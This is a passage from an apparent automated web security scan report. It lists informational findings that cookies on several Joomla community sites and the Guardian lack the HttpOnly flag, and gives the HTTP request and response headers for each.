Server: Apache
Set-Cookie: GU_MU=VFQyc2xRcjdERGtBQUJLenJTa0FBQUFhfElYV0o2UkFvL21wbDQ3R2hEWDJ0R2c9PQ==; path=/; domain=.guardian.co.uk; expires=Thu, 21-Jan-2021 16:45:09 GMT
Set-Cookie: GU_LOCATION=dXNhOjU6Zmw6NDpob2xseXdvb2Q6NDo1Mjg6YnJvYWRiYW5kOiAyNi4wNDg6LTgwLjEyNUAxNjEyOTYyMTg1OTMxNDExNDAzMjk3MTEyMDIxMDkyNzIzOTg3NTQ=; path=/; domain=.guardian.co.uk; expires=Mon, 14-Feb-2011 16:45:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-GU-httpd: 58
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 20899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...

14.763. http://www.guardian.co.uk/media/2011/jan/24/amazon-lovefilm-deal-films/x26source/x3duniv/x26sa/x3dX/x26ei/x3dh5I9TauLMMK88gazprSzCg/x26sqi/x3d2/x26ved/x3d0CHcQtgowCg/x22/x3eShared

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /media/2011/jan/24/amazon-lovefilm-deal-films/x26source/x3duniv/x26sa/x3dX/x26ei/x3dh5I9TauLMMK88gazprSzCg/x26sqi/x3d2/x26ved/x3d0CHcQtgowCg/x22/x3eShared

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • GU_MU=VFQyc21BcjdERGtBQUJLenJaZ0FBQUF2fGoxRDF3NkVwdXoyRzRZSm85RTN1Q1E9PQ==; path=/; domain=.guardian.co.uk; expires=Thu, 21-Jan-2021 16:45:12 GMT
  • GU_LOCATION=dXNhOjU6Zmw6NDpob2xseXdvb2Q6NDo1Mjg6YnJvYWRiYW5kOiAyNi4wNDg6LTgwLjEyNUAxNjUyMzAyMjA5OTIyMDEyMjc5MjUzMjQyMTgxNDM4NTIzOTEyMDU4NDU=; path=/; domain=.guardian.co.uk; expires=Mon, 14-Feb-2011 16:45:12 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/2011/jan/24/amazon-lovefilm-deal-films/x26source/x3duniv/x26sa/x3dX/x26ei/x3dh5I9TauLMMK88gazprSzCg/x26sqi/x3d2/x26ved/x3d0CHcQtgowCg/x22/x3eShared HTTP/1.1
Host: www.guardian.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:45:12 GMT
Server: Apache
Set-Cookie: GU_MU=VFQyc21BcjdERGtBQUJLenJaZ0FBQUF2fGoxRDF3NkVwdXoyRzRZSm85RTN1Q1E9PQ==; path=/; domain=.guardian.co.uk; expires=Thu, 21-Jan-2021 16:45:12 GMT
Set-Cookie: GU_LOCATION=dXNhOjU6Zmw6NDpob2xseXdvb2Q6NDo1Mjg6YnJvYWRiYW5kOiAyNi4wNDg6LTgwLjEyNUAxNjUyMzAyMjA5OTIyMDEyMjc5MjUzMjQyMTgxNDM4NTIzOTEyMDU4NDU=; path=/; domain=.guardian.co.uk; expires=Mon, 14-Feb-2011 16:45:12 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-GU-httpd: 58
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 20899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...

14.764. http://www.id-joomla.com/berita-joomla/648-joomla-16-telah-datang

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.id-joomla.com
Path:   /berita-joomla/648-joomla-16-telah-datang

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 49291818acdf6a0853370bd89db83d1e=s0aevrt4jrilpgl4pva0tih570; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /berita-joomla/648-joomla-16-telah-datang HTTP/1.1
Host: www.id-joomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:45:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Set-Cookie: 49291818acdf6a0853370bd89db83d1e=s0aevrt4jrilpgl4pva0tih570; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 16:45:23 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45105

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...

14.765. http://www.jgerman.de/news/projekt/joomla-16-ist-fertig.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jgerman.de
Path:   /news/projekt/joomla-16-ist-fertig.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 1d57acaeed6d03414d456a7cab9b5e05=ve36hni7tqkcjanm1ea6nul5kasiunjn; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/projekt/joomla-16-ist-fertig.html HTTP/1.1
Host: www.jgerman.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:25 GMT
Server: HTTPD
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 1d57acaeed6d03414d456a7cab9b5e05=ve36hni7tqkcjanm1ea6nul5kasiunjn; path=/
Last-Modified: Mon, 24 Jan 2011 16:01:27 GMT
Cache-Control: max-age=33135480, public
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28139

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-de" lang="de-de" dir="
...[SNIP]...

14.766. http://www.jobalot.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jobalot.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • CAKEPHP=aa3f49188b2ff5e884e64b9583b43ed3; expires=Fri, 25-Jan-2036 06:03:33 GMT; path=/; domain=.jobalot.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.jobalot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:03:33 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.9 mod_python/3.2.8 Python/2.4.3
X-Powered-By: PHP/5.2.9
Set-Cookie: CAKEPHP=aa3f49188b2ff5e884e64b9583b43ed3; expires=Fri, 25-Jan-2036 06:03:33 GMT; path=/; domain=.jobalot.com
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 7082
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Jobs and Employment
...[SNIP]...

14.767. http://www.joomla-serbia.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.joomla-serbia.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 917e8d5468e5e337c185e281d4187e98=03qc1as1mst2j6bva2la4dfq87; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.joomla-serbia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: 917e8d5468e5e337c185e281d4187e98=03qc1as1mst2j6bva2la4dfq87; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 16:01:19 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Date: Mon, 24 Jan 2011 16:01:19 GMT
Server: DCLXVI
Content-Length: 21055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xml:lang="sr-yu"
lang="sr-yu"
...[SNIP]...

14.768. http://www.joomla.cat/notes-mainmenu-2/1-darreres/2083-el-joomla-16-ja-es-aqui

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.joomla.cat
Path:   /notes-mainmenu-2/1-darreres/2083-el-joomla-16-ja-es-aqui

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 9314da27e21679ef814c2e3616267759=aggn177rv95albeviplr0a2it1; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /notes-mainmenu-2/1-darreres/2083-el-joomla-16-ja-es-aqui HTTP/1.1
Host: www.joomla.cat
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:13:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 9314da27e21679ef814c2e3616267759=aggn177rv95albeviplr0a2it1; path=/
Last-Modified: Mon, 24 Jan 2011 16:13:10 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16937


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ca-es" lang="ca-es" >
...[SNIP]...

14.769. http://www.joomla.fr/les-news-joomla/13-news-officielles/1032-joomla-1-6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.joomla.fr
Path:   /les-news-joomla/13-news-officielles/1032-joomla-1-6

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • 71961420e1faf09c5b938fb398f13f9d=f1c7cc8ce03b201034ffdeab744b7845; path=/
  • afuj-template_tpl=afuj-template; expires=Sat, 14-Jan-2012 15:57:53 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /les-news-joomla/13-news-officielles/1032-joomla-1-6 HTTP/1.1
Host: www.joomla.fr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.0
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 71961420e1faf09c5b938fb398f13f9d=f1c7cc8ce03b201034ffdeab744b7845; path=/
Set-Cookie: afuj-template_tpl=afuj-template; expires=Sat, 14-Jan-2012 15:57:53 GMT; path=/
Last-Modified: Mon, 24 Jan 2011 15:57:53 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20171

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- definition du type XHTML -->
<ht
...[SNIP]...

14.770. http://www.joomla.gr/--46/93-joomla-1-6/447-joomla-new-1-6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.joomla.gr
Path:   /--46/93-joomla-1-6/447-joomla-new-1-6

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • c0680a25a7d50af5bbee3643e0254219=a232897d27119dcf55e1ca99d18ca2fc; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /--46/93-joomla-1-6/447-joomla-new-1-6 HTTP/1.1
Host: www.joomla.gr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:15 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: c0680a25a7d50af5bbee3643e0254219=a232897d27119dcf55e1ca99d18ca2fc; path=/
Last-Modified: Mon, 24 Jan 2011 15:15:15 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26469

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-gr" lang="el-gr" >
<h
...[SNIP]...

14.771. http://www.joomla.it/notizie/4691-e-arrivato-joomlar-160.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.joomla.it
Path:   /notizie/4691-e-arrivato-joomlar-160.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 9ceb0f1becdca810c0080330d5ccb5f5=b5f02fcebb7f5e7d0e462177081c5aff; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /notizie/4691-e-arrivato-joomlar-160.html HTTP/1.1
Host: www.joomla.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:05:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Vary: User-Agent,Accept,Accept-Encoding
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 9ceb0f1becdca810c0080330d5ccb5f5=b5f02fcebb7f5e7d0e462177081c5aff; path=/
Last-Modified: Mon, 24 Jan 2011 16:05:42 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30832

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it-it" lang="it-it" >
   <h
...[SNIP]...

14.772. http://www.joomla.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.joomla.org
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 205e0a4a54bf75ec79a0fa3b9dc85fc0=41c830520f611d83ab14393c6f4ccb01; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.joomla.org
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:20:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 205e0a4a54bf75ec79a0fa3b9dc85fc0=41c830520f611d83ab14393c6f4ccb01; path=/
Last-Modified: Mon, 24 Jan 2011 02:20:15 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 46035

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<he
...[SNIP]...

14.773. http://www.joomla.org/16/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.joomla.org
Path:   /16/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 0c293deadc13e094debc5ff2622f129c=32c8df9d491ff8e9baed7f318c4c18f3; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /16/ HTTP/1.1
Host: www.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=11952431.1295835652.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11952431.1446326731.1295835652.1295835652.1295835652.1; __utmc=11952431; __utmb=11952431.5.10.1295835652; 205e0a4a54bf75ec79a0fa3b9dc85fc0=41c830520f611d83ab14393c6f4ccb01;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:22:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 0c293deadc13e094debc5ff2622f129c=32c8df9d491ff8e9baed7f318c4c18f3; path=/
Last-Modified: Mon, 24 Jan 2011 02:22:44 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 9206

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base href="http://www
...[SNIP]...

14.774. http://www.joomla.org.hu/joomla/46-kiadasok/272-megerkezett-a-joomla-16.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.joomla.org.hu
Path:   /joomla/46-kiadasok/272-megerkezett-a-joomla-16.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • a3c8e20ef07ced04de7a742c67ea7041=c47f7e47ae59d11b65fa8cc931aa7381; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /joomla/46-kiadasok/272-megerkezett-a-joomla-16.html HTTP/1.1
Host: www.joomla.org.hu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:12:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: a3c8e20ef07ced04de7a742c67ea7041=c47f7e47ae59d11b65fa8cc931aa7381; path=/
Set-Cookie: juah_tpl=juah; expires=Sat, 14-Jan-2012 15:12:03 GMT; path=/
Last-Modified: Mon, 24 Jan 2011 15:12:03 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 32201


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="hu-hu" lang="hu-hu">
...[SNIP]...

14.775. http://www.joomla.org.tw/news/joomla-official-news/163-joomla16-arrived

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.joomla.org.tw
Path:   /news/joomla-official-news/163-joomla16-arrived

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • a798c6463d2f54ee9d166568119e0c09=806uqp0b11fh0lrh0emunokum3; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/joomla-official-news/163-joomla16-arrived HTTP/1.1
Host: www.joomla.org.tw
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: a798c6463d2f54ee9d166568119e0c09=806uqp0b11fh0lrh0emunokum3; path=/
Last-Modified: Mon, 24 Jan 2011 16:01:14 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 56494

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-tw" lang="zh-tw" dir="
...[SNIP]...

14.776. http://www.joomla.ro/component/content/article/1-lansari/55-a-aparut-joomla-16

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.joomla.ro
Path:   /component/content/article/1-lansari/55-a-aparut-joomla-16

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • 0c17e6df7eeb8e50e6f6c79b91bcb8d6=8907c23320caff3200df60ba86a0f9cc; path=/
  • JRomania_tpl=JRomania; expires=Sat, 14-Jan-2012 15:15:28 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /component/content/article/1-lansari/55-a-aparut-joomla-16 HTTP/1.1
Host: www.joomla.ro
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:28 GMT
Server: Apache/2.2.11 (Mandriva Linux/PREFORK-10.10mdv2009.1)
X-Powered-By: PHP/5.2.14
Set-Cookie: 0c17e6df7eeb8e50e6f6c79b91bcb8d6=8907c23320caff3200df60ba86a0f9cc; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: JRomania_tpl=JRomania; expires=Sat, 14-Jan-2012 15:15:28 GMT; path=/
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:15:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19287


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ro-ro" lang="ro-ro">

<
...[SNIP]...

14.777. http://www.joomlacommunity.eu/nieuws/joomla-versies/572-joomla-16-nu-beschikbaar.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.joomlacommunity.eu
Path:   /nieuws/joomla-versies/572-joomla-16-nu-beschikbaar.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • f2b89666f144681ba17ab9a0996f50e0=fc830a5138c7cd5b8f7f3fa60df9a70c; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nieuws/joomla-versies/572-joomla-16-nu-beschikbaar.html HTTP/1.1
Host: www.joomlacommunity.eu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:07 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: f2b89666f144681ba17ab9a0996f50e0=fc830a5138c7cd5b8f7f3fa60df9a70c; path=/
Last-Modified: Mon, 24 Jan 2011 16:01:12 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 64750


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script src="http://www.jo
...[SNIP]...

14.778. http://www.joomlacorner.com/joomla-news/608-joomla-16-has-arrived.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.joomlacorner.com
Path:   /joomla-news/608-joomla-16-has-arrived.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • 992260232bef5a730b1bd291176df96d=4a98f8c53f4541210928f4c67e558242; path=/
  • ja_anion_tpl=ja_anion; expires=Sat, 14-Jan-2012 15:16:02 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /joomla-news/608-joomla-16-has-arrived.html HTTP/1.1
Host: www.joomlacorner.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.16
Set-Cookie: 992260232bef5a730b1bd291176df96d=4a98f8c53f4541210928f4c67e558242; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: ja_anion_tpl=ja_anion; expires=Sat, 14-Jan-2012 15:16:02 GMT; path=/
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:16:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31997

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="th-th" lang="th-th">

...[SNIP]...

14.779. http://www.joomlainorge.no/nyheter/joomla/552-joomlar-16-er-utgitt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.joomlainorge.no
Path:   /nyheter/joomla/552-joomlar-16-er-utgitt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 536a515975b0bb224c84dbf364570dc5=d25c0652ad8dc304e171cefb60e2e9c9; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nyheter/joomla/552-joomlar-16-er-utgitt HTTP/1.1
Host: www.joomlainorge.no
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

